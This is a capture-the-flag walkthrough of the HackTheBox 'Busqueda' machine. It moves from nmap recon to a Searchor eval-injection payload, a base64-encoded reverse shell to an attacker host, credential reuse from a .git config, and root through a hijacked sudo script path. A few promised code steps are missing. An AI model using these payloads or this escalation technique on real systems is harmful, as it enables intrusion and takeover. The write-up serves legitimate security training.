Busqueda

1. Inital Recon

1.1. nikto

seacher.htb -> add this to /etc/hosts

1.2. nmap

cmd: nmap -sC -sV 10.10.11.208

port 22 ssh port 80 http apache

1.3. domain recon

We can see at the bottom of the page that the web application is powered by Seachor 2.4.0

Which contains a RCE vulnerability that can be found at: https://github.com/ArjunSharda/Searchor/pull/130/files

If we capture the request using burp suite we can replace the query of the post request with the following python code to achieve RCE

a',print(eval('__import__(\"subprocess\").getoutput(\"pwd\")')))#

Encoding our reverse shell using base64

a',print(eval('__import__(\"subprocess\").getoutput(\"echo c2ggLWkgPiYgL2Rldi90Y3Ave0lQfS80NDQ0IDA+JjE= | base64 -d | bash \")')))#

After catching our reverse shell using a netcat listener we can do some recon on the file system of the web application

/var/www/app/.git/config contains some credentials for a gitea in the following URL: http://cody:[email protected]/cody/Searcher_site.git

2. Privilege Escalation

sudo -l

we can use jh1usoih2bkjaspwe92 as the sudo password and ssh password so we no longer need our reverse shell

add gitea.searcher.htb to /etc/hosts

log into gitea as cody with above credentials

by looking through the gitea repository we can see that there is an administrator user

Credentials are found using the docker-inspect commands that we are allowed to run with sudo permissions as our user Cody

login to the gitea using

On the gitea we can see in system-checkup.py that a script called ./full-checkup.sh is run by one of the commands

If we create our own ./full-checkup.sh in any directory that isn't /opt/scripts/ and run the above sudo command from where our own script is, then our script will be run instead of the one that is intended.

So we place a ./full-checkup.sh with the following bash code for another reverse shell but this time we will be root :)

Finally, run the sudo command with full-checkup option whilst having a netcat listener to catch the reverse shell.